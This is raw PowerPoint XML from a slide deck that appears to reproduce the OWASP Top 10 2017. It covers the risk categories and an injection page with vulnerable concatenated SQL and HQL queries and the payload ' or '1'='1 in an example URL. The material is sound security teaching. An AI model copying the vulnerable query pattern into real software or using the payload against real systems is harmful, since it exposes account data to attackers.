              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0014DB-969D-4359-A7D1-99F0AAA09C12}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="2677749"/>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151386" y="260127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A3:2017  Sensitive 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564637" y="3480730"/>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Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers,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151386" y="3404256"/>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A4:2017 XML External Entity (XXE)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Freeform 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25F57B3B-227A-4B44-B219-FB6A81F17116}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="4283711"/>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Restrictions on what authenticated users are allowed to do are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151386" y="4188334"/>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dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>A5:2017 Broken Access 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529380" y="5086692"/>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Security misconfiguration is the most common issue in the data, which is due in part to manual or ad hoc configuration (or not configuring at all), insecure default configurations, open S3 buckets, misconfigured HTTP headers, error messages containing sensitive information, not patching or upgrading systems, frameworks, dependencies, and components in a timely fashion (or at all). </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Freeform 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A858E023-0889-4FE9-9B01-62527B94C07F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="5010218"/>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A6:2017 Security Misconfiguration</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Freeform 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4E0F83D-B235-48A5-A352-7B6BBC2BAE17}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="5889673"/>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XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user 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151386" y="5813199"/>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A7:2017 </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Cross-Site 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564637" y="6692655"/>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algn="l" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Insecure deserialization flaws occur when an application receives hostile serialized objects. Insecure deserialization leads to remote code execution. Even if deserialization flaws do not result in remote code execution, serialized objects can be replayed, tampered or deleted to spoof users, conduct injection attacks, and elevate privileges. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Freeform 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1770D43A-73DB-44C0-AF41-71E9A314BA2B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="6616181"/>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A8:2017 Insecure Deserialization</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Freeform 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D3ABA2A-B6B4-4A1F-B3F6-D4C323A211D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="7495636"/>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Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial"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151386" y="7419162"/>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A9:2017 Using Components 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564637" y="8298617"/>
              <a:ext cx="5218177" cy="611796"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX1" fmla="*/ 509827 w 611795"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX2" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY2" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX3" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY3" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX4" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY4" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY5" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY6" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY7" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX8" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 521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795" h="5218176">
                  <a:moveTo>
                    <a:pt x="611795" y="869717"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611795" y="4348459"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="611795" y="4828785"/>
                    <a:pt x="606442" y="5218172"/>
                    <a:pt x="599840" y="5218172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599840" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="606442" y="4"/>
                    <a:pt x="611795" y="389391"/>
                    <a:pt x="611795" y="869717"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial"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a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial"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151386" y="8222143"/>
              <a:ext cx="1413251" cy="764744"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY0" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX1" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX2" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX3" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY3" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX4" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY4" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX5" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY5" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX6" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY6" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY7" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY8" fmla="*/ 127460 h 764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3251" h="764744">
                  <a:moveTo>
                    <a:pt x="0" y="127460"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57066"/>
                    <a:pt x="57066" y="0"/>
                    <a:pt x="127460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1285791" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1356185" y="0"/>
                    <a:pt x="1413251" y="57066"/>
                    <a:pt x="1413251" y="127460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1413251" y="637284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1413251" y="707678"/>
                    <a:pt x="1356185" y="764744"/>
                    <a:pt x="1285791" y="764744"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="127460" y="764744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57066" y="764744"/>
                    <a:pt x="0" y="707678"/>
                    <a:pt x="0" y="637284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="127460"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>A10:2017 </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Insufficient </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Logging &amp; Monitoring</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: An application uses untrusted data in the construction of the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SQL call: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String query = "SELECT * FROM accounts WHERE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HQLQuery</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session.createQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("FROM accounts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>custID</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("id") +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In both cases, the attacker modifies the ‘id’ parameter value in her browser to send:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' or '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. For example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/accountView?id=</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 or </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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This changes the meaning of both queries to return all the records from the accounts table.  More dangerous attacks could modify data or even invoke stored procedures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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Am I Vulnerable to Injection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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used within ORM search parameters such that the search evaluates out to include sensitive or all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rPr>
              <a:t>Hostile data is directly used or concatenated, such that the SQL or command contains both structure and hostile data in dynamic queries, commands, or in stored procedures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1270" indent="-1270">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Some of the more common injections are SQL, OS command, ORM, LDAP, and Expression Language (EL) or OGNL injection.. The concept is identical between all interpreters. Organizations can include SAST and DAST tooling into the CI/CD pipeline to alert if existing or newly checked in code has injection prior to production deployment. Manual and automated source code review is the best method of detecting if you are vulnerable to injections, closely followed by thorough DAST scans of all parameters, fields, headers, cookies, JSON, and XML data inputs.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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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5"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Parameterize Queries</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6"/>
              </a:rPr>
              <a:t>OWASP ASVS: V5 Input Validation and Encoding</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7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>ORM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0"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: SQL Injection Prevention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1"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Injection Prevention in Java</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2"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Query Parameterization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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Command Injection Defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId14"/>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5"/>
              </a:rPr>
              <a:t>CWE-77 Command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6"/>
              </a:rPr>
              <a:t>CWE-89 SQL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7"/>
              </a:rPr>
              <a:t>CWE-564 Hibernate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8"/>
              </a:rPr>
              <a:t>CWE-917 Expression Language Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>PortSwigger: Server-side template injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How Do I Prevent Injection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
